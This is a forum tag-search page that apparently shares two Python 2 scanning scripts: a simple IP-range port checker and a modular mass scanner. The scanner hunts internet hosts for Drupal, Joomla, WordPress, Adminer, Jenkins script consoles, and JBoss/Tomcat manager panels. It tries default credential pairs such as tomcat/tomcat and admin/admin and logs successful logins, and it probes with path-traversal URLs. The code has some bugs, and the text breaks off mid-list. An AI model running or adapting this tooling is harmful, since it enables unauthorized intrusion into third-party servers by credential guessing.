Jump to content
×
×
  • Create New...

Search the Community

Showing results for tags 'scanner'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • HOME
    • Shell_Meet
    • Shell_Talk
    • Board Meet
    • Announcements and Updates
    • Shell_Update
    • Pending Approvals
    • Member Introductions
    • Shell_Crew Support
  • HACKING & EXPLOITATION
    • Ctf Updates & Walkthroughs
    • Latest CVE-Info
    • Android/IOS Pentesting
    • Reverse Engineering
    • IoT Exploitation
    • Malware Analysis
    • API Pentesting
    • Cloud Security
    • Off-topic Lounge
  • CAREER
    • Internships
    • Career Discussion
    • Mentorship
    • Career Guidance
  • BUG BOUNTY
    • P5 (Informational Bugs)
    • P4 (Low-Level Bugs)
    • P3-P2 (High-Level Bugs)
    • P2-P1 (Critical Bugs)
    • Vulnerability Chaining
    • Report Writing
    • Personal Hunting Methodology
  • PROGRAMMING
    • Front-End Development
    • Scripting
    • Backend-Development
    • Application Development
    • Linux Kernel and OS Developers
    • Hardware Programming
    • DevOps
    • Queries Assessment
  • PROFESSIONAL CYBERSEC
    • Penetration Testing (Risk Assessment)
    • Red Teaming (Risk Assessment)
    • Blue Teaming (Risk Assessment)
    • Exploit Development (Risk Assessment)
    • OSINT-External and Internal (Threat Intelligence)
    • IOC (Threat Intelligence)
    • Awareness (Reinforcement)
    • Digital Forensics (Security Operations)
    • SOC & SIEM
  • Bug-Hunters's Resources
  • Open Source Contribution's Topics
  • Pentesting's Resources
  • SDR & AutoMobile Pentesting's Topics
  • Networking's Topics
  • Networking's Network Resources

Blogs

  • Open Source Contribution's Blogs

Categories

  • Bug-Hunt
  • Penetration Testing
  • Blue-Teaming

Product Groups

There are no results to display.

Categories

  • Pentesting
  • Bug-POC Videos
  • CTF-Walkthrough
  • Scripting
  • Bug-Hunters's Videos
  • SDR & AutoMobile Pentesting's Videos
  • Networking's Videos

Categories

  • Pentesting
  • Bug-Hunting
  • SDR & AutoMobile Pentesting's Tutorials

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me

Found 4 results

  1. import re import struct import socket IPV4PATTERN = re.compile('^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$') class InvalidIPError(Exception): pass class IPV4Range: def __init__(self, start, end): ''' Define an IPV4 Range ''' self.start = _validate_ip(start) self.end = _validate_ip(end) self.current = None def next(self): ''' Returns the next ip for this range Returns None if called after reaching end ''' if self.current != self.end: if self.current is not None: self.current = _increase_ip(self.current) else: self.current = self.start else: return False return self.current @staticmethod def knock_on_port(addr, port, timeout=1): ''' Tries to open current addr on given port Returns a tuple (status, error) Where status is boolean and error is an error string or None ''' try: conn = socket.create_connection((addr, port), timeout) except socket.error as e: return (False, str(e)) conn.close() return (True, None) def _validate_ip(addr): if not IPV4PATTERN.match(addr): raise InvalidIPError('%s is no valid IPv4 Addr.' % addr) return addr def _increase_ip(addr): ''' Claculate the next IP Addr ''' return _long2ip(_ip2long(addr) + 1) def _ip2long(addr): return struct.unpack('!L', socket.inet_aton(addr))[0] def _long2ip(long): return socket.inet_ntoa(struct.pack('!L', long)) SCAN.RAR
  2. #!/usr/bin/python #-*- coding:utf-8 -*- import inspect import re import urllib2 import threading import sys import ssl import requests class read_file_ip(): """ Read File line per line """ def __init__(self, file): try: self.file = open(file, "r+") except: print "[ERROR] Cant open File" self.actual_line = "" def next_line(self): """ Moves the pointer to the next line and returns this """ try: line = self.file.next().rstrip() except StopIteration: line = False except AttributeError: line = False self.actual_line = line return line def actual_line(self): """ Returns actual line, doesnt moves the pointer """ return self.actual_line class tools(): """ Here you can store all functions which you want to use a few times """ @staticmethod def logging(file, value): """ Log something to a file """ log_file = open(file, "a") log_file.write(value+"\r\n") log_file.close() @staticmethod def create_http_url(host, port, file = "/", prot = "http"): """ Create Url for Urllib2 """ return "%s://%s:%s%s" %(prot, host, port, file) @staticmethod def http_get(ip, port, file = "", timeout = None, url = None, ssl = False): """ GET HTTP Status Code, html and url from url or ip + file """ if url == None: if ssl == False: prot = "http" else: prot = "https" if port == None: port = 80 if file == None: raise("ERR: func_http_get: no url or file specified") url = "%s://%s:%s%s" %(prot, ip, port, file) if timeout == None: timeout = scan.conf_timeout try: conn = urllib2.urlopen(url, timeout = None) except urllib2.HTTPError as e: return [True, e.code, url, e.read()] except urllib2.URLError as e: return [False, None, None, None] except urllib2.socket.timeout as e: return [False, None, None, None] except requests.exceptions.SSLError as e: return e.message return [True, conn.code, url, conn.read()] @staticmethod def get_string_between(string, start, end): try: end_of_string = string.index(start) + len(start) start_of_string = string.index(end, end_of_string) return string[end_of_string:start_of_string] except: return False @staticmethod def get_http_headers(url, timeout = None): """ Get Http Headers and compare them to dictionary which will be returned """ main_url = url target_headers_dict = {} if timeout == None: timeout = scan.conf_timeout try: target_urllib = urllib2.urlopen(main_url, timeout = timeout) except urllib2.HTTPError as e: return {"Error" : e} except urllib2.URLError as e: return {"Error" : e} except urllib2.socket.timeout as e: return {"Error" : e} except: return {"Error" : "Unknown"} target_headers = target_urllib.info().headers for i in target_headers: i = i.strip() items = i.split(": ") try: target_headers_dict[items[0]] = items[1] except IndexError: print items #Heres some bug but to lazy to fix it ^^ Fixxed with try but no nice code... return target_headers_dict def check_if_any_from_arr_in_string(string, whitelist = None, blacklist = None): """ Check if any item from array is in string. Allows black and whitelist. """ if whitelist == None and blacklist == None: return False elif whitelist == None: whitelist == [] elif blacklist == None: blacklist == [] for i in blacklist: print i if any(k in string for k in whitelist) and any(k not in string for k in blacklist): return True else: return False def regex_not_match(string, regex): """ Returns True if regex does NOT match, false if it matches. Needed for check_if_any_reg_from_arr_in_string() """ if re.match(regex, string) == None: return True else: return False def check_if_any_reg_from_arr_in_string(string, whitelist = None, blacklist = None): """ Checks if any regex from array is in string. Allows black and whitelist. """ if whitelist == None and blacklist == None: return False elif whitelist == None: whitelist == [] elif blacklist == None: blacklist == [] if any(re.match(k, string) for k in whitelist) and any(regex_not_match(string, k) for k in blacklist): return True else: return False @staticmethod def http_basic_auth(theurl, username, password): passman = urllib2.HTTPPasswordMgrWithDefaultRealm() # this creates a password manager passman.add_password(None, theurl, username, password) # because we have put None at the start it will always # use this username/password combination for urls # for which `theurl` is a super-url authhandler = urllib2.HTTPBasicAuthHandler(passman) # create the AuthHandler opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) # All calls to urllib2.urlopen will now use our handler # Make sure not to include the protocol in with the URL, or # HTTPPasswordMgrWithDefaultRealm will be very confused. # You must (of course) use it when fetching the page though. try: pagehandle = urllib2.urlopen(theurl) except urllib2.HTTPError as e: return [False, e] # authentication is now handled automatically for us return [True, pagehandle.read()] class scan(): """ Class which does the Scanning Part. Here you can also add new scan modules. """ def __init__(self, timeout): self.mod_scan_list = [] self.func_scan_modules() self.conf_timeout = int(timeout) def check(self, ip, port): print "Scanning ",ip, port for mod in self.mod_scan_list: #print mod eval("self.module_scan_%s(\"%s\", %s)" %(mod, ip, port)) print "Finished ",ip, port def func_scan_modules(self): all_funcs = inspect.getmembers(self, inspect.ismethod) for func in all_funcs: func_name = eval("self.%s" %(func[0])) func_args = inspect.getargspec(func_name) func_real_name_split = func[0].split("_") #print func_args if func_real_name_split[0] == "module": if func_real_name_split[1] == "scan": self.mod_scan_list.append(func_real_name_split[2]) print "[Module] Scan: %s" %(func_real_name_split[2]) def module_scan_drupal1(self, ip, port): ############################################################# # Scan for Drupal (all versions) and log them ############################################################# __info__ = {"name" : "drupal", "log_result_file" : "log_drupal1.txt", "log_unknwn_result_file" : "unknwn_results_drupal1.txt", "paths" : ["/Drupal", "/admin/build", "/blog", "/cms", "/community", "/content", "/core", "/developer", "/drupal", "/drupal/user/login?destination=admin", "/includes", "/logout", "/modules", "/page", "/shop", "/site", "/store", "/vendor", "/web", "/weblog", "/website", "/drupal/drupal6", "/drupal/drupal7", "/drupal/drupal8", "/modules/devel", "/sites/all/themes/adaptivetheme/at_admin", "/sites/all/modules/date/date_migrate/date_migrate_example", "/sites/all/modules/date", "/sites/all/modules/devel", "/sites/mysite/modules/contrib/views_bulk_operations", "/sites/mysite/modules/contrib/devel", "Cmsgarden\Cmsscanner\Detector\Module", "/modules/ctools"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: main_server_info = tools().get_http_headers(main_url+path) if main_server_info.get("Expires") == "Sun, 19 Nov 1978 05:00:00 GMT": tools().logging(__info__['log_result_file'], main_url+path+" Server:"+path+ " "+main_server_info.get("X-Generator")) def module_scan_drupal2(self, ip, port): ############################################################# # Scan for Drupal (all versions) and log them ############################################################# __info__ = {"name" : "drupal", "log_result_file" : "log_drupal2.txt", "log_unknwn_result_file" : "unknwn_results_drupal2.txt", "paths" : ["/Drupal", "/admin/build", "/blog", "/cms", "/community", "/content", "/core", "/developer", "/drupal", "/drupal/user/login?destination=admin", "/includes", "/logout", "/modules", "/page", "/shop", "/site", "/store", "/vendor", "/web", "/weblog", "/website", "/drupal/drupal6", "/drupal/drupal7", "/drupal/drupal8", "/modules/devel", "/sites/all/themes/adaptivetheme/at_admin", "/sites/all/modules/date/date_migrate/date_migrate_example", "/sites/all/modules/date", "/sites/all/modules/devel", "/sites/mysite/modules/contrib/views_bulk_operations", "/sites/mysite/modules/contrib/devel", "Cmsgarden\Cmsscanner\Detector\Module", "/modules/ctools"], "marks" : ["Drupal"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/user/login" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Drupal:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_joomla1(self, ip, port): ############################################################# # Scan Hosts for installed Joomla and log them ############################################################# __info__ = {"name" : "joomla", "log_result_file" : "log_joomla1.txt", "log_unknwn_result_file" : "unknwn_results_joomla1.txt", "paths" : ["/joomla", "/cms", "/Joomla", "/administrator/help/en-GB/toc.json", "/administrator/language/en-GB/install.xml", "/plugins/system/debug/debug.xml", "/administrator/", "/joomla/joomla1.5", "/joomla/joomla2.5", "/joomla/joomla3.5"], "marks" : ["Joomla!", "http://www.joomla.org", "for=\"modlgn_username\">"], "marks_1.0x" : ["<meta name=\"generator\" content=\"Joomla! - Copyright (C) 2005 - 2007 Open Source Matters.\" />"], "marks_1.5x" : ["<meta name=\"generator\" content=\"Joomla! 1.5 - Open Source Content Management\" />"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/administrator" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: if any(k in target_return[3] for k in __info__['marks']): joomla_version = "UNKNOWN" if any(k in target_return[3] for k in __info__['marks_1.0x']): joomla_version = "1.0.x" if any(k in target_return[3] for k in __info__['marks_1.5x']): joomla_version = "1.5.x" result_line = "%s Version: %s Server: %s" %(main_url+path ,joomla_version, main_server_info['Server']) print "[*] JOOMLA:", target_url, "Version:", joomla_version tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_adminer(self, ip, port): ############################################################# #Scan for log_adminer_DB_LogIn by [email protected]@R-LightS ############################################################# __info__ = {"name" : "adminer", "log_result_file" : "log_adminer.txt", "log_unknwn_result_file" : "unknwn_results_adminer.txt", "paths" : ["/_adminer.php", "/ad.php", "/adminer/index.php", "/adminer1.php", "/mirasvit_adminer_431.php", "/mirasvit_adminer-4.2.3.php", "/latest.php", "/adminer-4.7.0.php", "/wp-content/uploads/adminer.php", "/wp-content/plugins/adminer/inc/editor/index.php", "/wp-content/adminer.php", "/adminer/adminer-4.7.0.php", "/upload/adminer.php", "/uploads/adminer.php", "/adminer/adminer.php", "/adminer/adminer.php", "/mysql-adminer.php", "/wp-admin/adminer.php", "/wp-admin/mysql-adminer.php", "/adminer/", "/adminer-4.2.5-en.php", "/adminer-4.2.5-mysql.php", "/adminer-4.2.5.php", "/adminer-4.3.0-en.php", "/adminer-4.3.0-mysql.php", "/adminer-4.3.0.php", "/adminer-4.3.1-en.php", "/adminer-4.3.1-mysql.php", "/adminer-4.3.1.php", "/adminer-4.4.0-en.php", "/adminer-4.4.0-mysql.php", "/adminer-4.4.0.php", "/adminer-4.5.0-en.php", "/adminer-4.5.0-mysql.php", "/adminer-4.5.0.php", "/adminer-4.6.0-en.php", "/adminer-4.6.0-mysql.php", "/adminer-4.6.0.php", "/adminer-4.6.1-en.php", "/adminer-4.6.1-mysql.php", "/adminer-4.6.1.php", "/adminer-4.3.0-en.php", "/adminer-4.3.1-mysql.php", "/adminer-4.3.1.php", "/adminer.php"], "marks" : ["Adminer", "https://www.adminer.org/de/"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Adminer:", target_url tools().logging(__info__['log_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) def module_scan_opencart(self, ip, port): ############################################################# # Scan Hosts for OpenCart and add. paths to exploits ! # by ##[email protected]## , [email protected]@R-LightS and L1ne:1337 THxxx ############################################################# __info__ = {"name" : "OpenCart", "log_result_file" : "log_opencart.txt", "log_unknwn_result_file" : "unknwn_results_opencart.txt", "paths" : ["/admin/common/login.php", "/opencart/upload", "/system/startup.php", "/admin/index.php", "/admin/config.php", "/install/index.php", "/catalog/controller/payment/authorizenet_aim.php", "/info.php", "/admin/controller/common/login.php", "/admin/controller/extension/payment.php"], "marks" : ["OpenCart", "https://www.opencart.com", "OpenCart 1", "Powered By OpenCart", "Shopping cart", "shop", "Vivid Ads Shopping Cart", "ShopMaker v1.0", "Powered by CS-Cart - Shopping Cart Software", "OpenCart 2", "OpenCart 3", "powered by OpenCart"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] OpenChart:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_prestashop(self, ip, port): ############################################################# # Scan Hosts for installed Prestashop and log them by [email protected]@R-LightS ############################################################# __info__ = {"name" : "Prestashop", "log_result_file" : "log_prestashop.txt", "log_unknwn_result_file" : "unknwn_results_prestashop.txt", "paths" : ["/store/admin", "/administrator", "/myshopadminpanel", "/adminfolder123", "/admin"], "marks" : ["prestashop", "Prestashop 1.1", "Prestashop 1.2", "Prestashop 1.3", "Prestashop 1.4", "Prestashop 1.5", "Prestashop 1.6", "Prestashop 1.7", "Prestashop 1.8", "www.prestashop.com()", "Powered by Prestashop"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Prestashop:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_wordpress(self, ip, port): ############################################################# # Scan Hosts for installed Wordpress and log them ############################################################# __info__ = {"name" : "wordpress", "log_result_file" : "log_wordpress.txt", "log_unknwn_result_file" : "unknwn_results_wordpress.txt", "paths" : ["/wordpress", "/wp", "/blog", "wp-login.php", "/wordpress/wp-login.php", "/Wordpress", "/Blog"], "marks" : ["wp-submit", "wp_attempt_focus()", "Powered by WordPress", "?action=lostpassword"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/wp-login.php" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] WordPress:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_httpserver(self, ip, port): ############################################################# # Log HTTPServer Information such as used Serversoftware # and Version if possible and log them ############################################################# __info__ = {"name" : "httpserverinfo", "log_result_file" : "log_httpserver.txt"} target_url = tools().create_http_url(ip, port, file = "", prot = "http") headers = tools().get_http_headers(target_url) try: headers_server = headers['Server'] except KeyError, TypeError: headers_server = "Unknown" #print headers_server tools().logging(__info__['log_result_file'], target_url+" Server:"+headers_server) def module_scan_phpcgi(self, ip, port): ############################################################# # Scan Hosts for PHPCGI and log them ############################################################# __info__ = {"name" : "phpcgi", "log_usec_result_file" : "log_php_cgi.txt", "paths" : ["/cgi-bin/php", "/cgi-bin/php5"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: tools().logging(__info__['log_usec_result_file'], target_url) def module_scan_ejbinvoker(self, ip, port): ############################################################# update:29.01.21 # Scan Hosts for installed Jboss/Tomcat Servers Ports to scan: (8080,9111,9832) # having a EJBInvoker and log them ############################################################# __info__ = {"name" : "EJBInvokerServlet", "log_usec_result_file" : "usec_result_ejb.txt", "log_sec_result_file" : "sec_results_ejb.txt", "log_unknwn_result_file" : "unknwn_results_ejb.txt", "paths" : ["/status?full=true"], "marks" : ["EJBInvokerServlet", "JMXInvokerServlet", "WWW-Authenticate: Basic realm=JBoss HTTP Invoker"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured # Check with k not in ... mark_fuzzed that the pma is not fucked up ;) if any(k in target_return[3] for k in __info__['marks']): print "[*] EJB (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) else: print "[*] EJB (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] EJB (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_jenkins(self, ip, port): #############################################################update:29.01.21 # Scan Hosts for installed Jenkins Server and log them Ports to scan: (80,82,84,100,443,515,1024,2002,2086,2121,2555,3428,3749,4444,4506, # 4840,5000,5432,5801,5858,7070,7777,8000,8066,8080,8081,8082,8086,8044, # 8087,8443,8500,9000,9002,9090,9095,9200,9595,9999,13579,55553,55554,60001) ############################################################# __info__ = {"name" : "jenkins", "log_usec_result_file" : "usec_result_jenkins.txt", "log_create_result_file" : "create_results_jenkins.txt", "log_sec_result_file" : "sec_results_jenkins.txt", "log_unknwn_result_file" : "unknwn_results_jenkins.txt", "paths" : ["/asynchPeople/", "/computer/", "/hudson/login", "/hudson/script", "/jenkins/login", "/jenkins/script", "/login", "/pview/", "/scripts" "/script", "/securityRealm/createAccount", "/signup", "/systemInfo", "/systeminf", "/manage" "/userContent/", "/view/All/builds", "/view/All/newjob"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured if target_return[3].find("println(Jenkins.instance.pluginManager.plugins)") != -1: print "[*] Jenkins (UNSEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) print target_return[3] elif target_return[3].find("\">Create an account</a> if you are not a member yet.</div></div></td></tr>") != -1: #might create account print "[*] Jenkins (CREATE):",target_url tools().logging(__info__['log_create_result_file'], target_url) print target_return[3] elif target_return[3].find("<title>Jenkins</title>") != -1: print "[*] Jenkins (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) print target_return[3] else: tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] Jenkins (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_jmx1(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for standard accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx1_secured.txt", "log_usec_result_file" : "log_jmx1_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx1.txt", "log_bruted_result_file" : "log_jmx1_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", "/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): if tools().http_basic_auth(target_url, "tomcat", "tomcat")[0] == True: result_line += " Account: tomcat / tomcat" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:tomcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "tomcat", "t0mcat")[0] == True: result_line += " Account: tomcat / t0mcat" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:t0mcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "tomcat", "admin")[0] == True: result_line += " Account: tomcat / admin" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "tomcat")[0] == True: result_line += " Account: admin / tomcat" print "[*] JMX (BRUTED):",target_url, "Login: admin:tomcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "admin")[0] == True: result_line += " Account: admin / admin" print "[*] JMX (BRUTED):",target_url, "Login: admin:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "manager")[0] == True: result_line += " Account: admin / manager" print "[*] JMX (BRUTED):",target_url, "Login: admin:manager" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "manager", "manager")[0] == True: result_line += " Account: manager / manager" print "[*] JMX (BRUTED):",target_url, "Login: manager:manager" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "manager", "admin")[0] == True: result_line += " Account: manager / admin" print "[*] JMX (BRUTED):",target_url, "Login: manager:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "root")[0] == True: result_line += " Account: admin / root" print "[*] JMX (BRUTED):",target_url, "Login: admin:root" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "root", "admin")[0] == True: result_line += " Account: root / admin" print "[*] JMX (BRUTED):",target_url, "Login: root:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "root", "root")[0] == True: result_line += " Account: root / root" print "[*] JMX (BRUTED):",target_url, "Login: root:root" tools().logging(__info__['log_bruted_result_file'], result_line) else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_jmx2(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) # Brute modded by moep ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx2_secured.txt", "log_usec_result_file" : "log_jmx2_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx2.txt", "log_bruted_result_file" : "log_jmx2_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", "/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", 